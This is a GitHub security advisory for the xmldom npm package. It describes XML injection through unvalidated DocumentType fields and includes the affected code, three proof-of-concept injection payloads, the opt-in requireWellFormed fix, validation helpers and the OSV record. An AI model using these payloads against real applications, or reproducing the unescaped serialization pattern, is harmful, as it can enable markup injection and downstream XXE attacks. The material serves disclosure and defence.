GHSA-F6WW-3GGP-FR8H

Vulnerability from github – Published: 2026-04-22 20:19 – Updated: 2026-04-22 20:19
Summary
xmldom has XML injection through unvalidated DocumentType serialization
Details

Summary

The package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim without any escaping or validation. When these fields are set programmatically to attacker-controlled strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is terminated early and arbitrary markup appears outside it.


Details

DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset) validates only qualifiedName against the XML QName production. The remaining three arguments are stored as-is with no validation.

The XMLSerializer emits DocumentType nodes as:

<!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]>

All fields are pushed into the output buffer verbatim — no escaping, no quoting added.
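
The emission logic can be modelled outside the library as plain string concatenation. The following is a minimal sketch that mirrors the serializer's DOCTYPE case listed under "Affected code". `emitDoctype` is a hypothetical helper name, not part of xmldom; the input is a plain object rather than a real DocumentType node; and the literal strings `<!DOCTYPE`, `PUBLIC`, and `SYSTEM` are assumed values for the `g.*` constants.

```javascript
// Hypothetical stand-in for the serializer's DOCTYPE case; this is not xmldom code.
function emitDoctype(node) {
  const buf = ['<!DOCTYPE', ' ', node.name]; // assumed value of g.DOCTYPE_DECL_START
  const pubid = node.publicId;
  const sysid = node.systemId;
  if (pubid) {
    buf.push(' ', 'PUBLIC', ' ', pubid); // pubid is appended exactly as stored
    if (sysid && sysid !== '.') {
      buf.push(' ', sysid);
    }
  } else if (sysid && sysid !== '.') {
    buf.push(' ', 'SYSTEM', ' ', sysid); // sysid is appended exactly as stored
  }
  if (node.internalSubset) {
    buf.push(' [', node.internalSubset, ']'); // only the brackets are added
  }
  buf.push('>');
  return buf.join('');
}

// Well-formed input: the caller supplies the quotes as part of each literal.
const benign = emitDoctype({
  name: 'html',
  publicId: '"-//W3C//DTD XHTML 1.0 Strict//EN"',
  systemId: '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"',
  internalSubset: '',
});
console.log(benign);
// <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

// Hostile input: the value closes the subset and the declaration by itself.
const hostile = emitDoctype({
  name: 'root',
  publicId: '',
  systemId: '',
  internalSubset: ']><injected/><![CDATA[',
});
console.log(hostile);
// <!DOCTYPE root []><injected/><![CDATA[]>
```

Because the caller supplies the quotes and the serializer supplies only spaces, keywords, and brackets, any delimiter inside a field is indistinguishable from one the serializer would have written.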

internalSubset injection: The serializer wraps internalSubset with [ and ]. A value containing ]> closes the internal subset and the DOCTYPE declaration at the injection point. Any content after ]> in internalSubset appears outside the DOCTYPE in the serialized output as raw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: @xmldom/xmldom ≥ 0.9.0 via createDocumentType API; 0.8.x only via direct property write.

publicId injection: The serializer emits publicId verbatim after PUBLIC with no quoting added. A value containing an injected system identifier (e.g., "pubid" SYSTEM "evil") breaks the intended quoting context, injecting a fake SYSTEM entry into the serialized DOCTYPE declaration. Identified during internal security research. Affected: both branches, all versions back to 0.1.0.

systemId injection: The serializer emits systemId verbatim. A value containing > terminates the DOCTYPE declaration early; content after > appears as raw XML markup outside the DOCTYPE context. Identified during internal security research. Affected: both branches, all versions back to 0.1.0.

The parse path is safe: the SAX parser enforces the PubidLiteral and SystemLiteral grammar productions, which exclude the relevant characters, and the internal subset parser only accepts a subset it can structurally validate. The vulnerability is reachable only programmatically, through createDocumentType calls with attacker-controlled arguments or through direct writes of attacker-controlled values to a DocumentType node's publicId, systemId, or internalSubset properties.


Affected code

lib/dom.js, createDocumentType (lines 898–910):

createDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {
    validateQualifiedName(qualifiedName);          // only qualifiedName is validated
    var node = new DocumentType(PDC);
    node.name = qualifiedName;
    node.nodeName = qualifiedName;
    node.publicId = publicId || '';               // stored verbatim
    node.systemId = systemId || '';               // stored verbatim
    node.internalSubset = internalSubset || '';   // stored verbatim
    node.childNodes = new NodeList();
    return node;
},

lib/dom.js — serializer DOCTYPE case (lines 2948–2964):

case DOCUMENT_TYPE_NODE:
    var pubid = node.publicId;
    var sysid = node.systemId;
    buf.push(g.DOCTYPE_DECL_START, ' ', node.name);
    if (pubid) {
        buf.push(' ', g.PUBLIC, ' ', pubid);
        if (sysid && sysid !== '.') {
            buf.push(' ', sysid);
        }
    } else if (sysid && sysid !== '.') {
        buf.push(' ', g.SYSTEM, ' ', sysid);
    }
    if (node.internalSubset) {
        buf.push(' [', node.internalSubset, ']');  // internalSubset emitted verbatim
    }
    buf.push('>');
    return;

PoC

internalSubset injection

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
    'root',
    '',
    '',
    ']><injected/><![CDATA['
);
const doc = impl.createDocument(null, 'root', doctype);
const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
//                   ^^^^^^^^^^  injected element outside DOCTYPE

publicId quoting context break

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
    'root',
    '"injected PUBLIC_ID" SYSTEM "evil"',
    '',
    ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root PUBLIC "injected PUBLIC_ID" SYSTEM "evil"><root/>
// quoting context broken — SYSTEM entry injected

systemId injection

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
    'root',
    '',
    '"sysid"><injected attr="pwn"/>',
    ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root SYSTEM "sysid"><injected attr="pwn"/>><root/>
// > in sysid closes DOCTYPE early; <injected/> appears as sibling element

Impact

An application that programmatically constructs DocumentType nodes from user-controlled data and then serializes the document can emit a DOCTYPE declaration where the internal subset is closed early or where injected SYSTEM entities or other declarations appear in the serialized output.

Downstream XML parsers that re-parse the serialized output and expand entities from the injected DOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.


Fix Applied

⚠ Opt-in required. Protection is not automatic. Existing serialization calls remain vulnerable unless { requireWellFormed: true } is explicitly passed. Applications that pass untrusted data to createDocumentType() or write untrusted values directly to a DocumentType node's publicId, systemId, or internalSubset properties should audit all serializeToString() call sites and add the option.

XMLSerializer.serializeToString() now accepts an options object as a second argument. When { requireWellFormed: true } is passed, the serializer validates the DocumentType node's publicId, systemId, and internalSubset fields before emitting the DOCTYPE declaration and throws InvalidStateError if any field contains an injection sequence:

  • publicId: throws if non-empty and does not match the XML PubidLiteral production (XML 1.0 [12])
  • systemId: throws if non-empty and does not match the XML SystemLiteral production (XML 1.0 [11])
  • internalSubset: throws if it contains ]> (which closes the internal subset and DOCTYPE declaration early)

All three checks apply regardless of how the invalid value entered the node — whether via createDocumentType arguments or a subsequent direct property write.
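
For applications that want to reject bad values before they reach the serializer, the three checks listed above can be approximated in application code. This is a sketch under stated assumptions, not the library's implementation: the regular expressions are written from the XML 1.0 grammar (productions [11], [12], and [13]), and `findDoctypeProblems` and its message strings are hypothetical.

```javascript
// Sketch only: patterns follow the XML 1.0 grammar, not xmldom's source.
// SystemLiteral [11]: a quoted string that does not contain its own quote character.
const SYSTEM_LITERAL = /^(?:"[^"]*"|'[^']*')$/;

// PubidLiteral [12]: a quoted string of PubidChar [13];
// the single-quoted form additionally excludes the apostrophe.
const PUBID_LITERAL =
  /^(?:"[\x20\x0D\x0Aa-zA-Z0-9\-'()+,.\/:=?;!*#@$_%]*"|'[\x20\x0D\x0Aa-zA-Z0-9\-()+,.\/:=?;!*#@$_%]*')$/;

// Hypothetical helper: returns a list of problems instead of throwing.
// Empty fields are skipped, matching the "non-empty" wording of the checks.
function findDoctypeProblems(fields) {
  const problems = [];
  if (fields.publicId && !PUBID_LITERAL.test(fields.publicId)) {
    problems.push('publicId is not a valid PubidLiteral');
  }
  if (fields.systemId && !SYSTEM_LITERAL.test(fields.systemId)) {
    problems.push('systemId is not a valid SystemLiteral');
  }
  if (fields.internalSubset && fields.internalSubset.includes(']>')) {
    problems.push('internalSubset contains "]>"');
  }
  return problems;
}

// The three payloads from the PoC section, one per field.
const pocResults = [
  findDoctypeProblems({ publicId: '"injected PUBLIC_ID" SYSTEM "evil"' }),
  findDoctypeProblems({ systemId: '"sysid"><injected attr="pwn"/>' }),
  findDoctypeProblems({ internalSubset: ']><injected/><![CDATA[' }),
];
console.log(pocResults.map((problems) => problems.length)); // [ 1, 1, 1 ]

// A conventional XHTML doctype passes all three checks.
const cleanResult = findDoctypeProblems({
  publicId: '"-//W3C//DTD XHTML 1.0 Strict//EN"',
  systemId: '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"',
  internalSubset: '',
});
console.log(cleanResult.length); // 0
```

Both literal patterns expect the surrounding quotes to be part of the stored value, since the serializer does not add any.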

PoC — fixed path

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

// internalSubset injection
const dt1 = impl.createDocumentType('root', '', '', ']><injected/><![CDATA[');
const doc1 = impl.createDocument(null, 'root', dt1);

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc1));
// <!DOCTYPE root []><injected/><![CDATA[]><root/>

// Opt-in guard: throws InvalidStateError
try {
  new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: DocumentType internalSubset contains "]>"
}

The guard also covers post-creation property writes:

const dt2 = impl.createDocumentType('root', '', '');
dt2.systemId = '"sysid"><injected attr="pwn"/>';
const doc2 = impl.createDocument(null, 'root', dt2);
new XMLSerializer().serializeToString(doc2, { requireWellFormed: true });
// InvalidStateError: DocumentType systemId is not a valid SystemLiteral

Why the default stays verbatim

The W3C DOM Parsing and Serialization spec §3.2.1.3 defines a require well-formed flag whose default value is false. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in requireWellFormed: true flag allows applications that require injection safety to enable strict mode without breaking existing deployments.

Residual limitation

createDocumentType(qualifiedName, publicId, systemId[, internalSubset]) does not validate publicId, systemId, or internalSubset at creation time. Adding creation-time validation would be a breaking change, so it is deferred to a future breaking release.

When the default serialization path is used (without requireWellFormed: true), all three fields are still emitted verbatim. Applications that do not pass requireWellFormed: true remain exposed.
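
One way to make the opt-in hard to forget is to route every serialization through a single wrapper. The sketch below assumes nothing about xmldom beyond the `serializeToString(node, options)` signature and the `requireWellFormed` option described above; `serializeStrict` and `recordingSerializer` are hypothetical names, and the stand-in serializer exists only so the example runs without the package installed.

```javascript
// Hypothetical wrapper: every call site uses this instead of serializeToString directly,
// so the opt-in guard cannot be omitted by accident.
function serializeStrict(serializer, node) {
  return serializer.serializeToString(node, { requireWellFormed: true });
}

// Stand-in serializer that records the options it receives. In an application this
// would be `new XMLSerializer()` from a fixed @xmldom/xmldom release.
const recordingSerializer = {
  calls: [],
  serializeToString(node, options) {
    this.calls.push(options);
    return '<root/>';
  },
};

const output = serializeStrict(recordingSerializer, {});
console.log(output); // <root/>
console.log(recordingSerializer.calls[0]); // { requireWellFormed: true }
```

With a real serializer, the wrapper propagates the InvalidStateError thrown by the guard, so callers should be prepared to handle it.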


{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@xmldom/xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@xmldom/xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.9.0"
            },
            {
              "fixed": "0.9.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41674"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-91"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T20:19:12Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe package serializes `DocumentType` node fields (`internalSubset`, `publicId`, `systemId`) verbatim\nwithout any escaping or validation. When these fields are set programmatically to attacker-controlled\nstrings, `XMLSerializer.serializeToString` can produce output where the DOCTYPE declaration is\nterminated early and arbitrary markup appears outside it.\n\n---\n\n## Details\n\n`DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset)` validates\nonly `qualifiedName` against the XML QName production. The remaining three arguments are stored\nas-is with no validation.\n\nThe XMLSerializer emits `DocumentType` nodes as:\n\n```\n\u003c!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]\u003e\n```\n\nAll fields are pushed into the output buffer verbatim \u2014 no escaping, no quoting added.\n\n**`internalSubset` injection:** The serializer wraps `internalSubset` with ` [` and `]`. A value\ncontaining `]\u003e` closes the internal subset and the DOCTYPE declaration at the injection point.\nAny content after `]\u003e` in `internalSubset` appears outside the DOCTYPE in the serialized output as\nraw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: `@xmldom/xmldom` \u2265 0.9.0\nvia `createDocumentType` API; 0.8.x only via direct property write.\n\n**`publicId` injection:** The serializer emits `publicId` verbatim after `PUBLIC` with no\nquoting added. A value containing an injected system identifier (e.g.,\n`\"pubid\" SYSTEM \"evil\"`) breaks the intended quoting context, injecting a fake SYSTEM entry\ninto the serialized DOCTYPE declaration. Identified during internal security research. Affected:\nboth branches, all versions back to 0.1.0.\n\n**`systemId` injection:** The serializer emits `systemId` verbatim. A value containing `\u003e`\nterminates the DOCTYPE declaration early; content after `\u003e` appears as raw XML markup outside\nthe DOCTYPE context. 
Identified during internal security research. Affected: both branches, all\nversions back to 0.1.0.\n\nThe parse path is safe: the SAX parser enforces the `PubidLiteral` and `SystemLiteral` grammar\nproductions, which exclude the relevant characters, and the internal subset parser only accepts a\nsubset it can structurally validate. The vulnerability is reachable only through programmatic\n`createDocumentType` calls with attacker-controlled arguments.\n\n---\n\n## Affected code\n\n**`lib/dom.js` \u2014 `createDocumentType` (lines 898\u2013910):**\n\n```js\ncreateDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {\n    validateQualifiedName(qualifiedName);          // only qualifiedName is validated\n    var node = new DocumentType(PDC);\n    node.name = qualifiedName;\n    node.nodeName = qualifiedName;\n    node.publicId = publicId || \u0027\u0027;               // stored verbatim\n    node.systemId = systemId || \u0027\u0027;               // stored verbatim\n    node.internalSubset = internalSubset || \u0027\u0027;   // stored verbatim\n    node.childNodes = new NodeList();\n    return node;\n},\n```\n\n**`lib/dom.js` \u2014 serializer DOCTYPE case (lines 2948\u20132964):**\n\n```js\ncase DOCUMENT_TYPE_NODE:\n    var pubid = node.publicId;\n    var sysid = node.systemId;\n    buf.push(g.DOCTYPE_DECL_START, \u0027 \u0027, node.name);\n    if (pubid) {\n        buf.push(\u0027 \u0027, g.PUBLIC, \u0027 \u0027, pubid);\n        if (sysid \u0026\u0026 sysid !== \u0027.\u0027) {\n            buf.push(\u0027 \u0027, sysid);\n        }\n    } else if (sysid \u0026\u0026 sysid !== \u0027.\u0027) {\n        buf.push(\u0027 \u0027, g.SYSTEM, \u0027 \u0027, sysid);\n    }\n    if (node.internalSubset) {\n        buf.push(\u0027 [\u0027, node.internalSubset, \u0027]\u0027);  // internalSubset emitted verbatim\n    }\n    buf.push(\u0027\u003e\u0027);\n    return;\n```\n\n---\n\n## PoC\n\n### internalSubset injection\n\n```js\nconst { 
DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n    \u0027root\u0027,\n    \u0027\u0027,\n    \u0027\u0027,\n    \u0027]\u003e\u003cinjected/\u003e\u003c![CDATA[\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n//                   ^^^^^^^^^^  injected element outside DOCTYPE\n```\n\n### publicId quoting context break\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n    \u0027root\u0027,\n    \u0027\"injected PUBLIC_ID\" SYSTEM \"evil\"\u0027,\n    \u0027\u0027,\n    \u0027\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root PUBLIC \"injected PUBLIC_ID\" SYSTEM \"evil\"\u003e\u003croot/\u003e\n// quoting context broken \u2014 SYSTEM entry injected\n```\n\n### systemId injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n    \u0027root\u0027,\n    \u0027\u0027,\n    \u0027\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u0027,\n    \u0027\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root SYSTEM \"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u003e\u003croot/\u003e\n// \u003e in sysid closes DOCTYPE early; \u003cinjected/\u003e appears as sibling element\n```\n\n---\n\n## Impact\n\nAn application that programmatically constructs `DocumentType` nodes from user-controlled data and\nthen serializes 
the document can emit a DOCTYPE declaration where the internal subset is closed\nearly or where injected SYSTEM entities or other declarations appear in the serialized output.\n\nDownstream XML parsers that re-parse the serialized output and expand entities from the injected\nDOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.\n\n---\n\n## Fix Applied\n\n\u003e **\u26a0 Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createDocumentType()` or write untrusted values directly to a\n\u003e `DocumentType` node\u0027s `publicId`, `systemId`, or `internalSubset` properties should audit\n\u003e all `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer validates the `DocumentType` node\u0027s `publicId`, `systemId`, and `internalSubset` fields before emitting the DOCTYPE declaration and throws `InvalidStateError` if any field contains an injection sequence:\n\n- **`publicId`**: throws if non-empty and does not match the XML `PubidLiteral` production (XML 1.0 [12])\n- **`systemId`**: throws if non-empty and does not match the XML `SystemLiteral` production (XML 1.0 [11])\n- **`internalSubset`**: throws if it contains `]\u003e` (which closes the internal subset and DOCTYPE declaration early)\n\nAll three checks apply regardless of how the invalid value entered the node \u2014 whether via `createDocumentType` arguments or a subsequent direct property write.\n\n### PoC \u2014 fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\nconst impl = new DOMImplementation();\n\n// internalSubset injection\nconst dt1 = impl.createDocumentType(\u0027root\u0027, \u0027\u0027, \u0027\u0027, 
\u0027]\u003e\u003cinjected/\u003e\u003c![CDATA[\u0027);\nconst doc1 = impl.createDocument(null, \u0027root\u0027, dt1);\n\n// Default (unchanged): verbatim \u2014 injection present\nconsole.log(new XMLSerializer().serializeToString(doc1));\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n\n// Opt-in guard: throws InvalidStateError\ntry {\n  new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });\n} catch (e) {\n  console.log(e.name, e.message);\n  // InvalidStateError: DocumentType internalSubset contains \"]\u003e\"\n}\n```\n\nThe guard also covers post-creation property writes:\n\n```js\nconst dt2 = impl.createDocumentType(\u0027root\u0027, \u0027\u0027, \u0027\u0027);\ndt2.systemId = \u0027\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u0027;\nconst doc2 = impl.createDocument(null, \u0027root\u0027, dt2);\nnew XMLSerializer().serializeToString(doc2, { requireWellFormed: true });\n// InvalidStateError: DocumentType systemId is not a valid SystemLiteral\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec \u00a73.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\n`createDocumentType(qualifiedName, publicId, systemId[, internalSubset])` does not validate `publicId`, `systemId`, or `internalSubset` at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), all three fields are still emitted verbatim. 
Applications that do not pass `requireWellFormed: true` remain exposed.",
  "id": "GHSA-f6ww-3ggp-fr8h",
  "modified": "2026-04-22T20:19:12Z",
  "published": "2026-04-22T20:19:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xmldom/xmldom"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/releases/tag/0.8.13"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/releases/tag/0.9.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "xmldom has XML injection through unvalidated DocumentType serialization"
}
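
The three "affected" ranges in the record above can be turned into a simple version check. This is a rough sketch, not an official tool: `isInAffectedRange` is a hypothetical helper, it handles only plain `major.minor.patch` strings, and a result of `false` means only that the `requireWellFormed` option is available in that release, not that serialization is safe by default.

```javascript
// Parse a plain "major.minor.patch" string; pre-release tags are out of scope for this sketch.
function parseVersion(version) {
  const match = /^(\d+)\.(\d+)\.(\d+)$/.exec(version);
  if (!match) throw new Error('unsupported version string: ' + version);
  return match.slice(1).map(Number);
}

// Returns -1, 0, or 1, comparing component by component.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Hypothetical helper encoding the ranges from the record.
function isInAffectedRange(packageName, version) {
  if (packageName === 'xmldom') {
    // Unscoped package: no fixed release is listed, last_affected is 0.6.0.
    return compareVersions(version, '0.6.0') <= 0;
  }
  if (packageName === '@xmldom/xmldom') {
    if (compareVersions(version, '0.9.0') >= 0) {
      return compareVersions(version, '0.9.10') < 0; // 0.9 branch, fixed in 0.9.10
    }
    return compareVersions(version, '0.8.13') < 0; // 0.8 branch and earlier, fixed in 0.8.13
  }
  throw new Error('package not covered by this advisory: ' + packageName);
}

console.log(isInAffectedRange('@xmldom/xmldom', '0.8.12')); // true
console.log(isInAffectedRange('@xmldom/xmldom', '0.8.13')); // false
console.log(isInAffectedRange('@xmldom/xmldom', '0.9.9'));  // true
console.log(isInAffectedRange('@xmldom/xmldom', '0.9.10')); // false
console.log(isInAffectedRange('xmldom', '0.6.0'));          // true
```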

